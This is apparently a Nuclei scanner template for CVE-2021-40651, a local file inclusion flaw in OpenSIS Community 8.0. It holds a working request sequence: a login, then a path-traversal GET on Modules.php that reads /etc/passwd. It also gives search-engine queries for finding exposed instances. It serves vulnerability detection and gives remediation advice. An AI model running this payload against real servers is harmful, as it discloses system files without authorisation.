Description
OS4Ed OpenSIS Community 8.0 is vulnerable to a local file inclusion vulnerability in Modules.php (modname parameter), which can disclose arbitrary file from the server's filesystem as long as the application has access to the file.
OS4Ed OpenSIS Community 8.0 is vulnerable to a local file inclusion vulnerability in Modules.php (modname parameter), which can disclose arbitrary file from the server's filesystem as long as the application has access to the file.
id: CVE-2021-40651
info:
name: OS4Ed OpenSIS Community 8.0 - Local File Inclusion
author: ctflearner
severity: medium
description: |
OS4Ed OpenSIS Community 8.0 is vulnerable to a local file inclusion vulnerability in Modules.php (modname parameter), which can disclose arbitrary file from the server's filesystem as long as the application has access to the file.
impact: |
Authenticated attackers can read arbitrary files from the server including /etc/passwd via path traversal in the modname parameter.
remediation: |
Upgrade to OpenSIS Community version 8.1 or later.
reference:
- https://www.exploit-db.com/exploits/50259
- https://github.com/MiSERYYYYY/Vulnerability-Reports-and-Disclosures/blob/main/OpenSIS-Community-8.0.md
- https://www.youtube.com/watch?v=wFwlbXANRCo
- https://nvd.nist.gov/vuln/detail/CVE-2021-40651
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2021-40651
cwe-id: CWE-22
epss-score: 0.17945
epss-percentile: 0.97028
cpe: cpe:2.3:a:os4ed:opensis:8.0:*:*:*:community:*:*:*
metadata:
max-request: 2
vendor: os4ed
product: opensis
shodan-query:
- "title:\"openSIS\""
- http.title:"opensis"
fofa-query: title="opensis"
google-query: intitle:"opensis"
tags: cve,cve2021,lfi,os4ed,opensis,authenticated,vuln
http:
- raw:
- |
POST /index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
USERNAME={{username}}&PASSWORD={{password}}&language=en&log=
- |
GET /Modules.php?modname=miscellaneous%2fPortal.php..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&failed_login= HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "regex('root:.*:0:0:', body)"
- 'contains(body_1, "openSIS")'
- "status_code == 200"
condition: and
# digest: 4a0a00473045022100f978918ffc223be642f80f6d53018f5176f6e658d82bd77c50c7fde99df0ab6f02201c2ec2b1b6eb83be3042e1e0194460b740d7088c40004182a8407239059d868a:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.